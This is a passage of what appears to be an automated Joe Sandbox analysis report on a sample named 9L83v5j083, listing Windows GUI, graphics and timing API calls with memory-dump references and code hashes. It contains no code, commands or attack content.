                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1976402638-0
                                                                                                                  • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                  • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                                  • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                  • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 642888154-0
                                                                                                                  • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                  • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                  • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                  • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$Copy$ClearErrorLast
                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                  • API String ID: 2487901850-572801152
                                                                                                                  • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                  • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                                  • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                  • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Enable$Show$MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1871949834-0
                                                                                                                  • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                  • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                                  • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                  • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                  • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                  • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                  • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                  APIs
                                                                                                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                                  • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                                  • SendMessageW.USER32 ref: 00471AE3
                                                                                                                  • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3611059338-0
                                                                                                                  • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                  • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                                  • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                  • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1640429340-0
                                                                                                                  • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                  • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                                  • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                  • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                  • _wcslen.LIBCMT ref: 004438CD
                                                                                                                  • _wcslen.LIBCMT ref: 004438E6
                                                                                                                  • _wcstok.LIBCMT ref: 004438F8
                                                                                                                  • _wcslen.LIBCMT ref: 0044390C
                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                                  • _wcstok.LIBCMT ref: 00443931
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3632110297-0
                                                                                                                  • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                  • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                                  • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                  • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 752480666-0
                                                                                                                  • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                  • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                                  • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                  • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3275902921-0
                                                                                                                  • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                  • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                                  • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                  • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3275902921-0
                                                                                                                  • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                  • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                                  • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                  • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2833360925-0
                                                                                                                  • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                  • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                                  • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                  • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32 ref: 004555C7
                                                                                                                  • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3691411573-0
                                                                                                                  • Opcode ID: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                                                                                  • Instruction ID: ee39a3c17b45488341a0d6beee4a1abd3419bb98b1a9b0cd73eda499273a4889
                                                                                                                  • Opcode Fuzzy Hash: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                                                                                  • Instruction Fuzzy Hash: C011B6B12047419BC710DF65EDC8A2A77A8BF18322F10066AFD50DB2D2D779D849C729
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                                  • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                                  • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                                  • EndPath.GDI32(?), ref: 004472D6
                                                                                                                  • StrokePath.GDI32(?), ref: 004472E4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 372113273-0
                                                                                                                  • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                  • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                                  • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                  • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
